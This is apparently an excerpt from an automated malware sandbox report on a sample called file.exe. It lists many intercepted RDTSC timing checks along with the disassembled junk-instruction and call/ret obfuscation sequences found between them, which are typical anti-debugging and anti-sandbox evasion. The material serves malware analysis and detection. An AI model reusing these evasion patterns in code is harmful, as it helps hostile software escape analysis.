                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F15BA second address: 11F15C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F2014 second address: 11F2018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F2018 second address: 11F201C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1DE4 second address: 11F1DEA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F201C second address: 11F2022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1DEA second address: 11F1DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1DF0 second address: 11F1E07 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3FACCA44B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jo 00007F3FACCA44C0h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F34C1 second address: 11F34E9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3FAC81390Ch 0x00000008 jnl 00007F3FAC813906h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3FAC813915h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F61BF second address: 11F61C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F7169 second address: 11F716D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F716D second address: 11F71EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3FACCA44C1h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f jg 00007F3FACCA44BCh 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F3FACCA44B8h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Ah 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D28D3h], ebx 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push ecx 0x0000003c call 00007F3FACCA44B8h 0x00000041 pop ecx 0x00000042 mov dword ptr [esp+04h], ecx 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc ecx 0x0000004f push ecx 0x00000050 ret 0x00000051 pop ecx 0x00000052 ret 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 jnp 00007F3FACCA44B6h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F9312 second address: 11F9317 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F9317 second address: 11F935E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F3FACCA44B8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D235Ch], edx 0x00000028 push esi 0x00000029 mov ebx, dword ptr [ebp+1246807Fh] 0x0000002f pop edi 0x00000030 push 00000000h 0x00000032 mov dword ptr [ebp+122D1A4Bh], ebx 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b pushad 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F935E second address: 11F936D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F3FAC813906h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FC14F second address: 11FC175 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3FACCA44B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b nop 0x0000000c mov di, cx 0x0000000f push 00000000h 0x00000011 xor ebx, 1EFE2AADh 0x00000017 push 00000000h 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e pop eax 0x0000001f jnp 00007F3FACCA44B6h 0x00000025 popad 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FC175 second address: 11FC17F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F3FAC813906h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FB3F7 second address: 11FB3FC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD2CD second address: 11FD2FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC813912h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F3FAC81390Dh 0x0000000f pop ebx 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push esi 0x00000018 pop esi 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE30B second address: 11FE311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE311 second address: 11FE315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD475 second address: 11FD479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE315 second address: 11FE38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a jmp 00007F3FAC813917h 0x0000000f pop edi 0x00000010 nop 0x00000011 mov ebx, ecx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push edi 0x00000018 call 00007F3FAC813908h 0x0000001d pop edi 0x0000001e mov dword ptr [esp+04h], edi 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc edi 0x0000002b push edi 0x0000002c ret 0x0000002d pop edi 0x0000002e ret 0x0000002f call 00007F3FAC813912h 0x00000034 mov bh, CAh 0x00000036 pop ebx 0x00000037 and bx, C56Ah 0x0000003c push 00000000h 0x0000003e cmc 0x0000003f or ebx, dword ptr [ebp+12474F6Bh] 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push edx 0x00000049 jl 00007F3FAC813906h 0x0000004f pop edx 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE38F second address: 11FE399 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3FACCA44BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD55F second address: 11FD57B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC81390Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FD57B second address: 11FD580 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF466 second address: 11FF46A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12003AF second address: 12003B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12003B3 second address: 1200412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F3FAC81C958h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov bx, 8D11h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007F3FAC81C958h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 mov edi, dword ptr [ebp+122D1CDEh] 0x0000004a push 00000000h 0x0000004c xchg eax, esi 0x0000004d push ecx 0x0000004e push edi 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1201432 second address: 1201437 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1201437 second address: 12014EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F3FAC81C958h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 jmp 00007F3FAC81C968h 0x00000029 push 00000000h 0x0000002b jmp 00007F3FAC81C969h 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 pushad 0x00000034 mov bx, dx 0x00000037 call 00007F3FAC81C966h 0x0000003c pop eax 0x0000003d popad 0x0000003e pop edi 0x0000003f xchg eax, esi 0x00000040 pushad 0x00000041 jmp 00007F3FAC81C965h 0x00000046 jmp 00007F3FAC81C969h 0x0000004b popad 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push ecx 0x00000050 push ecx 0x00000051 pop ecx 0x00000052 pop ecx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12014EA second address: 12014EF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12024CE second address: 12024D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE50C second address: 11FE510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE510 second address: 11FE516 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF687 second address: 11FF691 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3FACC550D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF691 second address: 11FF6A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC81C95Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE516 second address: 11FE51D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FF6A7 second address: 11FF6AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11FE51D second address: 11FE5BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jc 00007F3FACC550EDh 0x0000000e jc 00007F3FACC550E7h 0x00000014 jmp 00007F3FACC550E1h 0x00000019 nop 0x0000001a jmp 00007F3FACC550E4h 0x0000001f push dword ptr fs:[00000000h] 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F3FACC550D8h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 0000001Ah 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 xor edi, dword ptr [ebp+122D2A91h] 0x00000046 sub dword ptr [ebp+122D294Bh], ebx 0x0000004c mov dword ptr fs:[00000000h], esp 0x00000053 mov dword ptr [ebp+122D1C61h], edx 0x00000059 push ecx 0x0000005a mov di, ax 0x0000005d pop ebx 0x0000005e mov eax, dword ptr [ebp+122D1425h] 0x00000064 mov dword ptr [ebp+1246803Bh], edi 0x0000006a push FFFFFFFFh 0x0000006c mov dword ptr [ebp+122D1884h], edx 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jnc 00007F3FACC550D8h 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ABF08 second address: 11ABF0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ABF0C second address: 11ABF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3FACC550DFh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F3FACC550E7h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12026C9 second address: 12026E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3FAC81C969h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ABF3E second address: 11ABF65 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3FACC550D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jp 00007F3FACC550DAh 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 ja 00007F3FACC550DCh 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12035FD second address: 1203601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1205A23 second address: 1205A29 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1205A29 second address: 1205A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1205A2F second address: 1205A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1206CCC second address: 1206CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12107C2 second address: 12107D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FACC550DBh 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120FF1D second address: 120FF22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 120FF22 second address: 120FF3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F3FACC550D8h 0x00000011 push edi 0x00000012 jno 00007F3FACC550D6h 0x00000018 pop edi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121037D second address: 1210383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1214D02 second address: 1214D11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F3FACC550D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1214D11 second address: 1214D15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A9C1 second address: 121A9C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A9C5 second address: 121A9CF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3FAC81C956h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A9CF second address: 121A9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A9D5 second address: 121A9E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F3FAC81C95Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A9E5 second address: 121A9EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A382F second address: 11A3833 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3833 second address: 11A383D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3FACC550D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A383D second address: 11A384D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F3FAC81C956h 0x0000000a jp 00007F3FAC81C956h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219C40 second address: 1219C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219DCF second address: 1219DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F3FAC81C956h 0x0000000a ja 00007F3FAC81C956h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219F5C second address: 1219F62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1219F62 second address: 1219F7A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3FAC81C958h 0x00000008 jg 00007F3FAC81C958h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push esi 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A1E4 second address: 121A1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A1E8 second address: 121A20A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3FAC81C962h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F3FAC81C956h 0x00000013 push edi 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A385 second address: 121A395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F3FACC550D6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A395 second address: 121A3A1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jc 00007F3FAC81C956h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A3A1 second address: 121A3C3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3FACC550DEh 0x00000008 jo 00007F3FACC550D6h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F3FACC550DBh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A56B second address: 121A591 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3FAC81C969h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jl 00007F3FAC81C956h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A591 second address: 121A59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jno 00007F3FACC550D6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A882 second address: 121A886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121A886 second address: 121A88A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121EC9F second address: 121ECB0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007F3FAC81C956h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121ECB0 second address: 121ECBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3FACC550DAh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121ECBF second address: 121ECFF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3FAC81C96Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F3FAC81C966h 0x0000000f push eax 0x00000010 jmp 00007F3FAC81C966h 0x00000015 pop eax 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121ECFF second address: 121ED0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F3FACC550D6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121ED0E second address: 121ED1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F3FAC81C95Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121F916 second address: 121F91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121FBD1 second address: 121FBD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121FEE0 second address: 121FEE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121FEE6 second address: 121FEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A53AA second address: 11A53B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
